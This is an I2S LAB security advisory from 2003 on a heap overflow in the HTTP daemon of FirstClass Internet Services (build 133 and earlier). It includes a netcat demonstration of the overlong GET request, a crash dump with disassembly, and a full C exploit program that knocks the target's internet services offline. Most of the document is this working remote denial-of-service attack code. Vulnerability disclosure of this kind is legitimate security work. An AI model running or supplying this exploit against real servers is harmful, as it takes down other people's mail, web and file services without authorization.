###########################################################################################

				~ I2S LAB Security Advisory ~

###########################################################################################
http://www.I2S-LAB.com


Date : 25/09/2003

Affected systems : FirstClass build 133 (SP3) and previous versions HTTP Daemon

Vendor : http://www.centrinity.com

Issue : Attackers can remotely shutdown internet services (HTTP/FTP/SMTP/POP3/IMAP4/...)


Description
___________

FirstClass is a combination of solutions that allows a company to set up a reliable intranet 
by integrating powerful internet services and including most common communication protocols 
(SMTP/ HTTP/ FTP/ ...)


Technical Details
_________________

FirstClass's "Internet Services" plug-in has a remote DoS vulnerability in the HTTP daemon, which could be caused 
by a Heap Overflow overwriting a data pointer.

By sending a request on port 80 like:  GET / HTTP/1.1[A x 246]

FirstCLass Internet Services will cause an access violation error by trying to read somewhere in the
heap some data located outside of the adressing space allocated by the process.


D:\netcat>nc -vv 10.0.0.5 80
I2S-w2k [10.0.0.5] 80 (http) open
GET / HTTP/1.1AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAADDDD

sent 262, rcvd 0: NOTSOCK

D:\netcat>

*** Exception in program C:\FCServer\fcintsrv.exe
    Location: CList::GetNext+0000003C (004F882C)
       Error: Access violation
       Cause: Read attempted at <Unknown> (4444444C)

    Registers:
        EAX=01F2415C EBX=00C802F0 ECX=44444444     <-- pointer is overwritten here
        EDX=01F2415C ESI=00000000 EDI=00000000
        EIP=004F882C ESP=0205F86C EBP=0205F870 Flags=00000206

         CS=0000001B  DS=00000023  SS=00000023
         ES=00000023  FS=00000038  GS=00000000


:004F881D 8B55FC                  mov edx, dword ptr [ebp-04]
:004F8820 837A0400                cmp dword ptr [edx+04], 00000000
:004F8824 740B                    je 004F8831
:004F8826 8B45FC                  mov eax, dword ptr [ebp-04]
:004F8829 8B4804                  mov ecx, dword ptr [eax+04]
:004F882C 8B4108                  mov eax, dword ptr [ecx+08]         <--  crash occurs
:004F882F EB02                    jmp 004F8833


Exploit
_______


/*******************************************
 * FirstClass Internet Services Remote DoS *
 *******************************************
 
discovered & coded by I2S-LAB

 --------------------------------------------

This exploit uses a ptr overflow to remotely 
shutdown the Internet Services of FirstClass.


  CONTACT
  _______

  Fred CHAVEROT : fred[at]I2S-LAB.com
  Aurélien BOUDOUX : aurelien[at]I2S-LAB.com


  URL : http://www.I2S-LaB.com

 *******************************************/


#include <windows.h>
#include <winsock.h>
#pragma comment (lib,"wsock32.lib")

#define PerfectOverwrite 246

void main (int argc, char *argv[])
{

int len;
SOCKET sock1;
SOCKADDR_IN sin;
char *sav;

WSADATA wsadata;
WORD wVersionRequested = MAKEWORD (2,0);

printf ("- FirsClass Internet Services Remote DoS -\n\n"
"Discovered & coded by I2S-LAB\n"
"http://www.I2S-LaB.com\n\n");


if (!argv[1])
{
printf ("Usage : %s <IP Address>\n", argv[0]);
ExitProcess (0);
}

if (WSAStartup(wVersionRequested, &wsadata) ) ExitProcess (0);

if (!(sav = (char *) LocalAlloc (LPTR, 20 + PerfectOverwrite)) )
{
printf ("Error ! cannot allocate enough memory.\n");
ExitProcess (0); 
};

lstrcat (sav, "GET / HTTP/1.1");
memset (&sav[14], 'A', PerfectOverwrite - 4);
lstrcat (sav,"DDDD\r\n\r\n");

sin.sin_family = AF_INET;
sin.sin_port = htons (80);

if ( (sin.sin_addr.s_addr=inet_addr (argv[1])) == INADDR_NONE)
{
printf ("Incorrect IP Address : %s\n", argv[1]);
ExitProcess(0);
}

sock1 = socket (AF_INET, SOCK_STREAM, 0);

printf ("\nconnecting to %s...", argv[1]);

if ( connect (sock1,(SOCKADDR *)&sin, sizeof (sin)) == SOCKET_ERROR )
printf ("connection failed!\n");

else
{
printf ("ok!\nSending crafted request...");

send (sock1,sav, PerfectOverwrite + 18,0);
puts ("ok!");
} 

closesocket (sock1);
}


Solution
________

CENTRINITY Corp. has been warned and is currently working to fix the problem.

Until further notice, we advise you to use a filter to restrain the length of HTTP request sent to server.


Credits
_______


Aurélien BOUDOUX - aurelien[at]I2S-LaB.com
Fred CHAVEROT - fred[at]I2S-LaB.com